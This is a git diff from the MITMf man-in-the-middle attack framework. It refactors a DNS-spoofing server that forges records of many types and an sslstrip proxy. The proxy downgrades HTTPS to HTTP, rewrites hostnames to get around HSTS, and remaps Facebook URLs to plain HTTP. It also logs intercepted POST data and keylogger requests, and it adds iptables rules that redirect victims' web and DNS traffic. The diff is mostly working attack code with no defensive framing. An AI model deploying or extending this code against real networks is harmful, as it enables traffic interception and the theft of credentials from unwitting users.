getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) )) + + elif qtype == "DNSKEY": + flags, protocol, algorithm, key = fake_record.split(" ") + flags = int(flags) + protocol = int(protocol) + algorithm = int(algorithm) + key = base64.b64decode(("".join(key)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) )) + + elif qtype == "RRSIG": + covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ") + covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE + algorithm = int(algorithm) + labels = int(labels) + orig_ttl = int(orig_ttl) + sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z"))) + sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z"))) + key_tag = int(key_tag) + if name[-1] == '.': name = name[:-1] + sig = base64.b64decode(("".join(sig)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig))) + + else: + # dnslib doesn't like trailing dots + if fake_record[-1] == ".": fake_record = fake_record[:-1] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record))) + + response = response.pack() + + elif qtype == "*" and not None in fake_records.values(): + dnschef_logger.info("{} cooking the response of type '{}' for {} with {}".format(self.client_address[0], "ANY", qname, "all known fake records.")) + + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap,qr=1, aa=1, ra=1), q=d.q) + + for qtype,fake_record in fake_records.items(): + if fake_record: + + # NOTE: RDMAP is a dictionary map of qtype strings to handling classses + # IPv6 needs additional work before inclusion: + if qtype == "AAAA": + ipv6 = IP(fake_record) + ipv6_bin = ipv6.strBin() + fake_record = [int(ipv6_bin[i:i+8],2) for i in xrange(0,len(ipv6_bin),8)] + + elif qtype == "SOA": + mname,rname,t1,t2,t3,t4,t5 = fake_record.split(" ") + times = tuple([int(t) for t in [t1,t2,t3,t4,t5]]) + + # dnslib doesn't like trailing dots + if mname[-1] == ".": mname = mname[:-1] + if rname[-1] == ".": rname = rname[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](mname,rname,times))) + + elif qtype == "NAPTR": + order,preference,flags,service,regexp,replacement = fake_record.split(" ") + order = int(order) + preference = int(preference) + + # dnslib doesn't like trailing dots + if replacement and replacement[-1] == ".": replacement = replacement[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](order,preference,flags,service,regexp,replacement))) + + elif qtype == "SRV": + priority, weight, port, target = fake_record.split(" ") + priority = int(priority) + weight = int(weight) + port = int(port) + if target[-1] == ".": target = target[:-1] + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](priority, weight, port, target) )) + + elif qtype == "DNSKEY": + flags, protocol, algorithm, key = fake_record.split(" ") + flags = int(flags) + protocol = int(protocol) + algorithm = int(algorithm) + key = base64.b64decode(("".join(key)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](flags, protocol, algorithm, key) )) + + elif qtype == "RRSIG": + covered, algorithm, labels, orig_ttl, sig_exp, sig_inc, key_tag, name, sig = fake_record.split(" ") + covered = getattr(QTYPE,covered) # NOTE: Covered QTYPE + algorithm = int(algorithm) + labels = int(labels) + orig_ttl = int(orig_ttl) + sig_exp = int(time.mktime(time.strptime(sig_exp +'GMT',"%Y%m%d%H%M%S%Z"))) + sig_inc = int(time.mktime(time.strptime(sig_inc +'GMT',"%Y%m%d%H%M%S%Z"))) + key_tag = int(key_tag) + if name[-1] == '.': name = name[:-1] + sig = base64.b64decode(("".join(sig)).encode('ascii')) + + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](covered, algorithm, labels,orig_ttl, sig_exp, sig_inc, key_tag, name, sig) )) + + else: + # dnslib doesn't like trailing dots + if fake_record[-1] == ".": fake_record = fake_record[:-1] + response.add_answer(RR(qname, getattr(QTYPE,qtype), rdata=RDMAP[qtype](fake_record))) + + response = response.pack() + + # Proxy the request + else: + dnschef_logger.debug("[DNSChef] {} proxying the response of type '{}' for {}".format(self.client_address[0], qtype, qname)) + + nameserver_tuple = random.choice(nameservers).split('#') + response = self.proxyrequest(data, *nameserver_tuple) + + return response + + + # Find appropriate ip address to use for a queried name. The function can + def findnametodns(self,qname,nametodns): + + # Make qname case insensitive + qname = qname.lower() + + # Split and reverse qname into components for matching. + qnamelist = qname.split('.') + qnamelist.reverse() + + # HACK: It is important to search the nametodns dictionary before iterating it so that + # global matching ['*.*.*.*.*.*.*.*.*.*'] will match last. Use sorting for that. + for domain,host in sorted(nametodns.iteritems(), key=operator.itemgetter(1)): + + # NOTE: It is assumed that domain name was already lowercased + # when it was loaded through --file, --fakedomains or --truedomains + # don't want to waste time lowercasing domains on every request. + + # Split and reverse domain into components for matching + domain = domain.split('.') + domain.reverse() + + # Compare domains in reverse. + for a,b in map(None,qnamelist,domain): + if a != b and b != "*": + break + else: + # Could be a real IP or False if we are doing reverse matching with 'truedomains' + return host + else: + return False + + # Obtain a response from a real DNS server. + def proxyrequest(self, request, host, port="53", protocol="udp"): + reply = None + try: + if DNSChef.getInstance().ipv6: + + if protocol == "udp": + sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM) + elif protocol == "tcp": + sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + + else: + if protocol == "udp": + sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + elif protocol == "tcp": + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + + sock.settimeout(3.0) + + # Send the proxy request to a randomly chosen DNS server + + if protocol == "udp": + sock.sendto(request, (host, int(port))) + reply = sock.recv(1024) + sock.close() + + elif protocol == "tcp": + sock.connect((host, int(port))) + + # Add length for the TCP request + length = binascii.unhexlify("%04x" % len(request)) + sock.sendall(length+request) + + # Strip length from the response + reply = sock.recv(1024) + reply = reply[2:] + + sock.close() + + except Exception, e: + dnschef_logger.warning("could not proxy request: {}".format(e)) + else: + return reply + + def hstsbypass(self, real_domain, fake_domain, nameservers, d): + + dnschef_logger.info("{} resolving '{}' to '{}' for HSTS bypass".format(self.client_address[0], fake_domain, real_domain)) + + response = DNSRecord(DNSHeader(id=d.header.id, bitmap=d.header.bitmap, qr=1, aa=1, ra=1), q=d.q) + + nameserver_tuple = random.choice(nameservers).split('#') + + #First proxy the request with the real domain + q = DNSRecord.question(real_domain).pack() + r = self.proxyrequest(q, *nameserver_tuple) + + #Parse the answer + dns_rr = DNSRecord.parse(r).rr + + #Create the DNS response + for res in dns_rr: + if res.get_rname() == real_domain: + res.set_rname(fake_domain) + response.add_answer(res) + else: + response.add_answer(res) + + return response.pack() + +# UDP DNS Handler for incoming requests +class UDPHandler(DNSHandler, SocketServer.BaseRequestHandler): + + def handle(self): + (data,socket) = self.request + response = self.parse(data) + + if response: + socket.sendto(response, self.client_address) + +# TCP DNS Handler for incoming requests +class TCPHandler(DNSHandler, SocketServer.BaseRequestHandler): + + def handle(self): + data = self.request.recv(1024) + + # Remove the addition "length" parameter used in the + # TCP DNS protocol + data = data[2:] + response = self.parse(data) + + if response: + # Calculate and add the additional "length" parameter + # used in TCP DNS protocol + length = binascii.unhexlify("%04x" % len(response)) + self.request.sendall(length+response) + +class ThreadedUDPServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer): + + # Override SocketServer.UDPServer to add extra parameters + def __init__(self, server_address, RequestHandlerClass): + self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET + + SocketServer.UDPServer.__init__(self,server_address,RequestHandlerClass) + +class ThreadedTCPServer(SocketServer.ThreadingMixIn, SocketServer.TCPServer): + + # Override default value + allow_reuse_address = True + + # Override SocketServer.TCPServer to add extra parameters + def __init__(self, server_address, RequestHandlerClass): + self.address_family = socket.AF_INET6 if DNSChef.getInstance().ipv6 else socket.AF_INET + + SocketServer.TCPServer.__init__(self,server_address,RequestHandlerClass) + +class DNSChef(ConfigWatcher): + + _instance = None + + tcp = False + ipv6 = False + hsts = False + real_records = dict() + nametodns = dict() + server_address = "0.0.0.0" + nameservers = ["8.8.8.8"] + port = 53 + + @staticmethod + def getInstance(): + if DNSChef._instance == None: + DNSChef._instance = DNSChef() + + return DNSChef._instance + + def onConfigChange(self): + config = self.config['MITMf']['DNS'] + + self.port = int(config['port']) + + # Main storage of domain filters + # NOTE: RDMAP is a dictionary map of qtype strings to handling classe + for qtype in RDMAP.keys(): + self.nametodns[qtype] = dict() + + # Adjust defaults for IPv6 + if config['ipv6'].lower() == 'on': + self.ipv6 = True + if config['nameservers'] == "8.8.8.8": + self.nameservers = "2001:4860:4860::8888" + + # Use alternative DNS servers + if config['nameservers']: + self.nameservers = config['nameservers'].split(',') + + for section in config.sections: + + if section in self.nametodns: + for domain,record in config[section].iteritems(): + + # Make domain case insensitive + domain = domain.lower() + + self.nametodns[section][domain] = record + + for k,v in self.config["SSLstrip+"].iteritems(): + self.real_records[v] = k + + def setHstsBypass(self): + self.hsts = True + + def start(self): + self.onConfigChange() + self.startConfigWatch() + + if self.config['MITMf']['DNS']['tcp'].lower() == 'on': + self.startTCP() + else: + self.startUDP() + + # Initialize and start the DNS Server + def startUDP(self): + server = ThreadedUDPServer((self.server_address, int(self.port)), UDPHandler) + # Start a thread with the server -- that thread will then start + # more threads for each request + server_thread = threading.Thread(target=server.serve_forever) + + # Exit the server thread when the main thread terminates + server_thread.daemon = True + server_thread.start() + + # Initialize and start the DNS Server + def startTCP(self): + server = ThreadedTCPServer((self.server_address, int(self.port)), TCPHandler) + + # Start a thread with the server -- that thread will then start + # more threads for each request + server_thread = threading.Thread(target=server.serve_forever) + + # Exit the server thread when the main thread terminates + server_thread.daemon = True + server_thread.start() diff --git a/core/sslstrip/ClientRequest.py b/core/sslstrip/ClientRequest.py index 11db682..721438b 100644 --- a/core/sslstrip/ClientRequest.py +++ b/core/sslstrip/ClientRequest.py @@ -49,17 +49,15 @@ class ClientRequest(Request): Request.__init__(self, channel, queued) self.reactor = reactor self.urlMonitor = URLMonitor.getInstance() - self.hsts = URLMonitor.getInstance().isHstsBypass() + self.hsts = URLMonitor.getInstance().hsts self.cookieCleaner = CookieCleaner.getInstance() self.dnsCache = DnsCache.getInstance() self.plugins = ProxyPlugins.getInstance() #self.uniqueId = random.randint(0, 10000) #Use are own DNS server instead of reactor.resolve() - self.resolver = URLMonitor.getInstance().getResolver() self.customResolver = dns.resolver.Resolver() self.customResolver.nameservers = ['127.0.0.1'] - self.customResolver.port = URLMonitor.getInstance().getResolverPort() def cleanHeaders(self): headers = self.getAllHeaders().copy() @@ -70,7 +68,7 @@ class ClientRequest(Request): if self.hsts: if 'referer' in headers: - real = self.urlMonitor.real + real = self.urlMonitor.getHstsConfig()[0] if len(real) > 0: dregex = re.compile("({})".format("|".join(map(re.escape, real.keys())))) headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer']) @@ -133,7 +131,7 @@ class ClientRequest(Request): if self.hsts: host = self.urlMonitor.URLgetRealHost(str(host)) - real = self.urlMonitor.real + real = self.urlMonitor.getHstsConfig()[0] patchDict = self.urlMonitor.patchDict url = 'http://' + host + path self.uri = url # set URI to absolute @@ -179,7 +177,7 @@ class ClientRequest(Request): self.proxyViaHTTP(address, self.method, path, postData, headers, port) def handleHostResolvedError(self, error): - mitmf_logger.debug("[ClientRequest] Host resolution error: " + str(error)) + mitmf_logger.debug("[ClientRequest] Host resolution error: {}".format(error)) try: self.finish() except: @@ -195,16 +193,20 @@ class ClientRequest(Request): mitmf_logger.debug("[ClientRequest] Host not cached.") - if self.resolver == 'dnschef': + if self.urlMonitor.getResolver() == 'dnschef': + + self.customResolver.port = self.urlMonitor.getResolverPort() + try: mitmf_logger.debug("[ClientRequest] Resolving with DNSChef") address = str(self.customResolver.query(host)[0].address) return defer.succeed(address) except Exception: - mitmf_logger.debug("[ClientRequest] Exception occured, falling back to reactor.resolve()") + mitmf_logger.debug("[ClientRequest] Exception occured, falling back to Twisted") return reactor.resolve(host) - elif self.resolver == 'twisted': + elif self.urlMonitor.getResolver() == 'twisted': + mitmf_logger.debug("[ClientRequest] Resolving with Twisted") return reactor.resolve(host) def process(self): diff --git a/core/sslstrip/SSLServerConnection.py b/core/sslstrip/SSLServerConnection.py index 406d100..f0db397 100644 --- a/core/sslstrip/SSLServerConnection.py +++ b/core/sslstrip/SSLServerConnection.py @@ -40,7 +40,7 @@ class SSLServerConnection(ServerConnection): def __init__(self, command, uri, postData, headers, client): ServerConnection.__init__(self, command, uri, postData, headers, client) self.urlMonitor = URLMonitor.getInstance() - self.hsts = URLMonitor.getInstance().isHstsBypass() + self.hsts = URLMonitor.getInstance().hsts def getLogLevel(self): return logging.INFO @@ -58,7 +58,7 @@ class SSLServerConnection(ServerConnection): if v[:7].lower()==' domain': dominio=v.split("=")[1] mitmf_logger.debug("[SSLServerConnection][HSTS] Parsing cookie domain parameter: %s"%v) - real = self.urlMonitor.sustitucion + real = self.urlMonitor.getHstsConfig()[1] if dominio in real: v=" Domain=%s"%real[dominio] mitmf_logger.debug("[SSLServerConnection][HSTS] New cookie domain parameter: %s"%v) @@ -85,13 +85,13 @@ class SSLServerConnection(ServerConnection): if ((not link.startswith('http')) and (not link.startswith('/'))): absoluteLink = "http://"+self.headers['host']+self.stripFileFromPath(self.uri)+'/'+link - mitmf_logger.debug("Found path-relative link in secure transmission: " + link) - mitmf_logger.debug("New Absolute path-relative link: " + absoluteLink) + mitmf_logger.debug("[SSLServerConnection] Found path-relative link in secure transmission: " + link) + mitmf_logger.debug("[SSLServerConnection] New Absolute path-relative link: " + absoluteLink) elif not link.startswith('http'): absoluteLink = "http://"+self.headers['host']+link - mitmf_logger.debug("Found relative link in secure transmission: " + link) - mitmf_logger.debug("New Absolute link: " + absoluteLink) + mitmf_logger.debug("[SSLServerConnection] Found relative link in secure transmission: " + link) + mitmf_logger.debug("[SSLServerConnection] New Absolute link: " + absoluteLink) if not absoluteLink == "": absoluteLink = absoluteLink.replace('&', '&') diff --git a/core/sslstrip/ServerConnection.py b/core/sslstrip/ServerConnection.py index d5acf5f..d048d6e 100644 --- a/core/sslstrip/ServerConnection.py +++ b/core/sslstrip/ServerConnection.py @@ -55,8 +55,8 @@ class ServerConnection(HTTPClient): self.client = client self.clientInfo = None self.urlMonitor = URLMonitor.getInstance() - self.hsts = URLMonitor.getInstance().isHstsBypass() - self.app = URLMonitor.getInstance().isAppCachePoisoning() + self.hsts = URLMonitor.getInstance().hsts + self.app = URLMonitor.getInstance().app self.plugins = ProxyPlugins.getInstance() self.isImageRequest = False self.isCompressed = False @@ -70,7 +70,7 @@ class ServerConnection(HTTPClient): if self.command == 'GET': try: user_agent = parse(self.headers['user-agent']) - self.clientInfo = "{0} [type:{1}-{2} os:{3}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) + self.clientInfo = "{} [type:{}-{} os:{}] ".format(self.client.getClientIP(), user_agent.browser.family, user_agent.browser.version[0], user_agent.os.family) except: self.clientInfo = "{} ".format(self.client.getClientIP()) @@ -93,7 +93,7 @@ class ServerConnection(HTTPClient): elif 'keylog' in self.uri: self.plugins.hook() else: - mitmf_logger.warning("{0} {1} Data ({2}):\n{3}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) + mitmf_logger.warning("{} {} Data ({}):\n{}".format(self.client.getClientIP(), self.getPostPrefix(), self.headers['host'], self.postData)) self.transport.write(self.postData) def connectionMade(self): @@ -106,7 +106,7 @@ class ServerConnection(HTTPClient): self.sendPostData() def handleStatus(self, version, code, message): - mitmf_logger.debug("[ServerConnection] Server response: {0} {1} {2}".format(version, code, message)) + mitmf_logger.debug("[ServerConnection] Server response: {} {} {}".format(version, code, message)) self.client.setResponseCode(int(code), message) def handleHeader(self, key, value): diff --git a/core/sslstrip/ServerConnectionFactory.py b/core/sslstrip/ServerConnectionFactory.py index 759eaef..a64c800 100644 --- a/core/sslstrip/ServerConnectionFactory.py +++ b/core/sslstrip/ServerConnectionFactory.py @@ -34,12 +34,12 @@ class ServerConnectionFactory(ClientFactory): return self.protocol(self.command, self.uri, self.postData, self.headers, self.client) def clientConnectionFailed(self, connector, reason): - mitmf_logger.debug("Server connection failed.") + mitmf_logger.debug("[ServerConnectionFactory] Server connection failed.") destination = connector.getDestination() if (destination.port != 443): - mitmf_logger.debug("Retrying via SSL") + mitmf_logger.debug("[ServerConnectionFactory] Retrying via SSL") self.client.proxyViaSSL(self.headers['host'], self.command, self.uri, self.postData, self.headers, 443) else: try: diff --git a/core/sslstrip/URLMonitor.py b/core/sslstrip/URLMonitor.py index 56e7de3..4d632f1 100644 --- a/core/sslstrip/URLMonitor.py +++ b/core/sslstrip/URLMonitor.py @@ -18,6 +18,7 @@ import re, os import logging +from core.ConfigWatcher import ConfigWatcher mitmf_logger = logging.getLogger('mimtf') @@ -31,8 +32,6 @@ class URLMonitor: # Start the arms race, and end up here... javascriptTrickery = [re.compile("http://.+\.etrade\.com/javascript/omntr/tc_targeting\.html")] _instance = None - sustitucion = {} # LEO: diccionario host / sustitucion - real = {} # LEO: diccionario host / real patchDict = { 'https:\/\/fbstatic-a.akamaihd.net':'http:\/\/webfbstatic-a.akamaihd.net', 'https:\/\/www.facebook.com':'http:\/\/social.facebook.com', @@ -46,9 +45,6 @@ class URLMonitor: self.faviconReplacement = False self.hsts = False self.app = False - self.hsts_config = None - self.resolver = 'dnschef' - self.resolverport = 53 @staticmethod def getInstance(): @@ -57,21 +53,13 @@ class URLMonitor: return URLMonitor._instance - #This is here because I'm lazy - def setResolver(self, resolver): - self.resolver = str(resolver).lower() - #This is here because I'm lazy def getResolver(self): - return self.resolver - - #This is here because I'm lazy - def setResolverPort(self, port): - self.resolverport = int(port) + return ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['resolver'].lower() #This is here because I'm lazy def getResolverPort(self): - return self.resolverport + return int(ConfigWatcher.getInstance().getConfig()['MITMf']['DNS']['port']) def isSecureLink(self, client, url): for expression in URLMonitor.javascriptTrickery: @@ -92,7 +80,7 @@ class URLMonitor: s.add(to_url) return url_set = set([from_url, to_url]) - mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set) + mitmf_logger.debug("[URLMonitor][AppCachePoison] Set redirection: {}".format(url_set)) self.redirects.append(url_set) def getRedirectionSet(self, url): @@ -123,15 +111,15 @@ class URLMonitor: port = 443 if self.hsts: - if not self.sustitucion.has_key(host): + if not self.getHstsConfig[1].has_key(host): lhost = host[:4] if lhost=="www.": - self.sustitucion[host] = "w"+host - self.real["w"+host] = host + self.getHstsConfig[1][host] = "w"+host + self.getHstsConfig[0]["w"+host] = host else: - self.sustitucion[host] = "web"+host - self.real["web"+host] = host - mitmf_logger.debug("[URLMonitor][HSTS] SSL host (%s) tokenized (%s)" % (host,self.sustitucion[host]) ) + self.getHstsConfig[1][host] = "web"+host + self.getHstsConfig[0]["web"+host] = host + mitmf_logger.debug("[URLMonitor][HSTS] SSL host ({}) tokenized ({})".format(host, self.getHstsConfig[1][host])) url = 'http://' + host + path #mitmf_logger.debug("HSTS stripped URL: %s %s"%(client, url)) @@ -139,7 +127,7 @@ class URLMonitor: self.strippedURLs.add((client, url)) self.strippedURLPorts[(client, url)] = int(port) - return 'http://'+ self.sustitucion[host] + path + return 'http://'+ self.getHstsConfig[1][host] + path else: url = method + host + path @@ -150,40 +138,35 @@ class URLMonitor: def setFaviconSpoofing(self, faviconSpoofing): self.faviconSpoofing = faviconSpoofing - def setHstsBypass(self, hstsconfig): - self.hsts = True - self.hsts_config = hstsconfig + def getHstsConfig(self): + sustitucion = dict() + real = dict() - for k,v in self.hsts_config.iteritems(): - self.sustitucion[k] = v - self.real[v] = k + for k,v in ConfigWatcher.getInstance().getConfig()['SSLstrip+']: + sustitucion[k] = v + real[v] = k + + return (real, sustitucion) + + def setHstsBypass(self): + self.hsts = True def setAppCachePoisoning(self): self.app = True - def setClientLogging(self, clientLogging): - self.clientLogging = clientLogging - def isFaviconSpoofing(self): return self.faviconSpoofing - def isClientLogging(self): - return self.clientLogging - - def isHstsBypass(self): - return self.hsts - - def isAppCachePoisoning(self): - return self.app - def isSecureFavicon(self, client, url): return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1)) def URLgetRealHost(self, host): - mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: %s"% host) - if self.real.has_key(host): - mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host]) - return self.real[host] + mitmf_logger.debug("[URLMonitor][HSTS] Parsing host: {}".format(host)) + + if self.getHstsConfig()[0].has_key(host): + mitmf_logger.debug("[URLMonitor][HSTS] Found host in list: {}".format(self.getHstsConfig()[0][host])) + return self.getHstsConfig()[0][host] + else: - mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: %s"% host) + mitmf_logger.debug("[URLMonitor][HSTS] Host not in list: {}".format(host)) return host diff --git a/core/utils.py b/core/utils.py index 233f959..4d83911 100644 --- a/core/utils.py +++ b/core/utils.py @@ -20,58 +20,71 @@ # import os -import random -import linecache import sys +import random +import logging -def PrintException(): - exc_type, exc_obj, tb = sys.exc_info() - f = tb.tb_frame - lineno = tb.tb_lineno - filename = f.f_code.co_filename - linecache.checkcache(filename) - line = linecache.getline(filename, lineno, f.f_globals) - return '({}, LINE {} "{}"): {}'.format(filename, lineno, line.strip(), exc_obj) +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy +from scapy.all import get_if_addr, get_if_hwaddr class SystemConfig: - @staticmethod - def setIpForwarding(value): - with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: - file.write(str(value)) - file.close() + @staticmethod + def setIpForwarding(value): + with open('/proc/sys/net/ipv4/ip_forward', 'w') as file: + file.write(str(value)) + file.close() + + @staticmethod + def getIP(interface): + try: + ip_address = get_if_addr(interface) + if (ip_address == "0.0.0.0") or (ip_address is None): + sys.exit("[-] Interface {} does not have an assigned IP address".format(interface)) + + return ip_address + except Exception, e: + sys.exit("[-] Error retrieving IP address from {}: {}".format(interface, e)) + + @staticmethod + def getMAC(interface): + try: + mac_address = get_if_hwaddr(interface) + return mac_address + except Exception, e: + sys.exit("[-] Error retrieving MAC address from {}: {}".format(interface, e)) class IpTables: - _instance = None + _instance = None - def __init__(self): - self.dns = False - self.http = False + def __init__(self): + self.dns = False + self.http = False - @staticmethod - def getInstance(): - if IpTables._instance == None: - IpTables._instance = IpTables() + @staticmethod + def getInstance(): + if IpTables._instance == None: + IpTables._instance = IpTables() - return IpTables._instance + return IpTables._instance - def Flush(self): - os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') - self.dns = False - self.http = False + def Flush(self): + os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X') + self.dns = False + self.http = False - def HTTP(self, http_redir_port): - os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % http_redir_port) - self.http = True + def HTTP(self, http_redir_port): + os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port {}'.format(http_redir_port)) + self.http = True - def DNS(self, ip, port): - os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to %s:%s' % (ip, port)) - self.dns = True + def DNS(self, ip, port): + os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to {}:{}'.format(ip, port)) + self.dns = True class Banners: - banner1 = """ + banner1 = """ __ __ ___ .--. __ __ ___ | |/ `.' `. |__| | |/ `.' `. _.._ | .-. .-. '.--. .| | .-. .-. ' .' .._| @@ -85,7 +98,7 @@ class Banners: `'-' |_| """ - banner2= """ + banner2= """ ███▄ ▄███▓ ██▓▄▄▄█████▓ ███▄ ▄███▓ █████▒ ▓██▒▀█▀ ██▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██ ▒ ▓██ ▓██░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒████ ░ @@ -97,7 +110,7 @@ class Banners: ░ ░ ░ """ - banner3 = """ + banner3 = """ ▄▄▄▄███▄▄▄▄ ▄█ ███ ▄▄▄▄███▄▄▄▄ ▄████████ ▄██▀▀▀███▀▀▀██▄ ███ ▀█████████▄ ▄██▀▀▀███▀▀▀██▄ ███ ███ ███ ███ ███ ███▌ ▀███▀▀██ ███ ███ ███ ███ █▀ @@ -108,7 +121,7 @@ class Banners: ▀█ ███ █▀ █▀ ▄████▀ ▀█ ███ █▀ ███ """ - banner4 = """ + banner4 = """ ___ ___ ___ /\ \ /\ \ /\__\ |::\ \ ___ ___ |::\ \ /:/ _/_ @@ -121,7 +134,16 @@ class Banners: \:\__\ /:/ / \:\__\ \:\__\ \:\__\ \/__/ \/__/ \/__/ \/__/ \/__/ """ - - def printBanner(self): - banners = [self.banner1, self.banner2, self.banner3, self.banner4] - print random.choice(banners) \ No newline at end of file + + banner5 = """ +███╗ ███╗██╗████████╗███╗ ███╗███████╗ +████╗ ████║██║╚══██╔══╝████╗ ████║██╔════╝ +██╔████╔██║██║ ██║ ██╔████╔██║█████╗ +██║╚██╔╝██║██║ ██║ ██║╚██╔╝██║██╔══╝ +██║ ╚═╝ ██║██║ ██║ ██║ ╚═╝ ██║██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝╚═╝ +""" + + def printBanner(self): + banners = [self.banner1, self.banner2, self.banner3, self.banner4, self.banner5] + print random.choice(banners) \ No newline at end of file diff --git a/libs/dnschef b/libs/dnschef deleted file mode 160000 index d24a8c2..0000000 --- a/libs/dnschef +++ /dev/null @@ -1 +0,0 @@ -Subproject commit d24a8c2237eaae372e60a47f175694e8afa07c32 diff --git a/mitmf.py b/mitmf.py index 74e469a..97bedfe 100755 --- a/mitmf.py +++ b/mitmf.py @@ -28,21 +28,16 @@ from twisted.internet import reactor from core.sslstrip.CookieCleaner import CookieCleaner from core.sergioproxy.ProxyPlugins import ProxyPlugins from core.utils import Banners -from core.utils import PrintException -from configobj import ConfigObj - -logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy -from scapy.all import get_if_addr, get_if_hwaddr +from core.configwatcher import ConfigWatcher from plugins import * -plugin_classes = plugin.Plugin.__subclasses__() try: import user_agents except ImportError: print "[-] user_agents library missing! User-Agent parsing will be disabled!" -mitmf_version = "0.9.6" +mitmf_version = "0.9.6-dev" sslstrip_version = "0.9" sergio_version = "0.2.1" dnschef_version = "0.4" @@ -75,6 +70,8 @@ sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a l sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.") #Initialize plugins +plugin_classes = plugin.Plugin.__subclasses__() + plugins = [] try: for p in plugin_classes: @@ -99,37 +96,6 @@ except NotImplementedError: args = parser.parse_args() -try: - configfile = ConfigObj(args.configfile) -except Exception, e: - sys.exit("[-] Error parsing config file: {}".format(e)) - -config_args = configfile['MITMf']['args'] -if config_args: - print "[*] Loading arguments from config file" - for arg in config_args.split(' '): - sys.argv.append(arg) - args = parser.parse_args() - -#################################################################################################### - -# Here we check for some variables that are very commonly used, and pass them down to the plugins -try: - args.ip_address = get_if_addr(args.interface) - if (args.ip_address == "0.0.0.0") or (args.ip_address is None): - sys.exit("[-] Interface {} does not have an assigned IP address".format(args.interface)) -except Exception, e: - sys.exit("[-] Error retrieving interface IP address: {}".format(e)) - -try: - args.mac_address = get_if_hwaddr(args.interface) -except Exception, e: - sys.exit("[-] Error retrieving interface MAC address: {}".format(e)) - -args.configfile = configfile #so we can pass the configobj down to all the plugins - -#################################################################################################### - log_level = logging.__dict__[args.log_level.upper()] #Start logging @@ -158,11 +124,9 @@ for p in plugins: print "| |_ {}".format(line) p.tree_output.remove(line) - if getattr(args, p.optname): p.initialize(args) load.append(p) - if vars(args)[p.optname] is True: if hasattr(p, 'tree_output') and p.tree_output: for line in p.tree_output: print "| |_ {}".format(line) @@ -170,21 +134,15 @@ for p in plugins: #Plugins are ready to go, start MITMf if args.disproxy: ProxyPlugins.getInstance().setPlugins(load) + DNSChef.getInstance().start() else: - from core.sslstrip.StrippingProxy import StrippingProxy from core.sslstrip.URLMonitor import URLMonitor - from libs.dnschef.dnschef import DNSChef + from core.dnschef.dnschef import DNSChef URLMonitor.getInstance().setFaviconSpoofing(args.favicon) - URLMonitor.getInstance().setResolver(args.configfile['MITMf']['DNS']['resolver']) - URLMonitor.getInstance().setResolverPort(args.configfile['MITMf']['DNS']['port']) - DNSChef.getInstance().setCoreVars(args.configfile['MITMf']['DNS']) - if args.configfile['MITMf']['DNS']['tcp'].lower() == 'on': - DNSChef.getInstance().startTCP() - else: - DNSChef.getInstance().startUDP() + DNSChef.getInstance().start() CookieCleaner.getInstance().setEnabled(args.killsessions) ProxyPlugins.getInstance().setPlugins(load) @@ -195,10 +153,12 @@ else: reactor.listenTCP(args.listen, strippingFactory) #load custom reactor options for plugins that have the 'plugin_reactor' attribute - for p in plugins: - if getattr(args, p.optname): - if hasattr(p, 'plugin_reactor'): - p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + for p in load: + if hasattr(p, 'plugin_reactor'): + p.plugin_reactor(strippingFactory) #we pass the default strippingFactory, so the plugins can use it + + if hasattr(p, 'startConfigWatch'): + p.startConfigWatch() print "|" print "|_ Sergio-Proxy v{} online".format(sergio_version) diff --git a/plugins/AppCachePoison.py 